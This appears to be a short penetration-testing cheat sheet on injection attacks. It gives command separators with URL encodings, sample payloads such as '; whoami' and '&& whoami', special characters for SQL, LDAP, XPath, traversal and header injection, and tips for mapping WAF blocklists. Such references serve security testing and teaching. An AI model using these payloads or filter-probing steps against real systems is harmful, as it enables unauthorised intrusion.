OS command injection
Code injection
SQL injections
XSS/HTML injection
LDAP injection
NoSQL injection
HTTP header injection
XPath injection
IMAP injection
ORM injection
Try to injection commands through various injection methods.
See the changes in the output
Use any of the below command injection methods to inject another command so both or either of the commands get executed.
NOTE: semi-colon ; which will not work if it is executed with windows command line.
Semicolon
;
%3b or %3B
Both
New Line
\n (use decode)
%0a
Both
Background
&
%26
Both (second output generally shown first)
Pipe
|
%7c
Both (only second output is shown)
AND
&&
%26%26
Both (only if first succeeds)
OR
|
%7c%7c
Second (only if first fails)
Sub-Shell
``
%60%60
Both (Linux-only)
Sub-Shell
$()
%24%28%29
Both (Linux-only)
Semi-colon injection
Add a semi-colon after the IP address and put any other command along with semi-colon.
; whoami
AND injection
&& whoami (it runs only when first command succeeds)
OR injection
|| whoami (it runs only when first command fails)
SQL Injection
' , ; -- /* */
Command Injection
; &&
LDAP Injection
* ( ) & |
XPath Injection
' or and not substring concat count
OS Command Injection
; & |
Code Injection
' ; -- /* */ $() ${} #{} %{} ^
Directory Traversal/File Path Traversal
../ ..\\ %00
Object Injection
; & |
XQuery Injection
' ; -- /* */
Shellcode Injection
\x \u %u %n
Header Injection
\n \r\n \t %0d %0a %09
Identifying filters
WAF detection:
If we get error message like invalid input, blocked. It indicates that web application security mechanism got triggered.
Analysis what is block or what not on the web application by trying different injection methods and commands.
A web application may have blacklisted characters, and if command contains any of them, it would deny the request.
Reduce the request with one character at a time and see when it get blocked.
Last updated